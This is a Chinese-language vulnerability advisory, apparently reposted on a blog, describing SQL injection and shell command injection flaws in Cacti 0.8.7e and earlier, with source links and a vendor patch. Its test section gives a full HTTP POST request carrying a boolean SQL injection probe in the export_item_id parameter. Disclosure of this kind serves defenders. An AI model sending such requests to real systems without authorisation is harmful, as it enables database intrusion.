Cacti SQL注入和命令注入漏洞

受影响系统:

Cacti Cacti <= 0.8.7e

描述:

Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。

Cacti没有正确地过滤提交给templates_export.php页面的export_item_id参数便在SQL查询中使用,远程攻击者可以通过提交恶意请求执行SQL注入攻击;此外在添加或编辑设备时没有正确地过滤传送给主机名的输入,在添加或编辑图形目标时没有正确的过滤传送给垂直标签的输入,这可能导致注入并执行任意shell命令。

<*来源:Nahuel Grisolia
  
  链接:
http://secunia.com/advisories/39570/
        http://secunia.com/advisories/39568/
        http://www.bonsai-sec.com/en/research/vulnerabilities/cacti-os-command-injection-0105.php
        http://www.bonsai-sec.com/en/research/vulnerabilities/cacti-sql-injection-0104.php
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://www.example.com/cacti-0.8.7e/templates_export.php
Cookie: clickedFolder=tree_1%5Etree_1_leaf_7%5E; highlightedTreeviewLink=tree_1_leaf_7;
Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

export_item_id=18 and 1=1&amp;include_deps=on&amp;output_format=3&amp;export_type=graph_template&amp;
save_component_export=1&amp;action=save&amp;x=24&amp;y=12

建议:

厂商补丁:

Cacti
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cacti.net/downloads/patches/0.8.7e/sql_injection_template_export.patch

发表评论?

0 条评论。

发表评论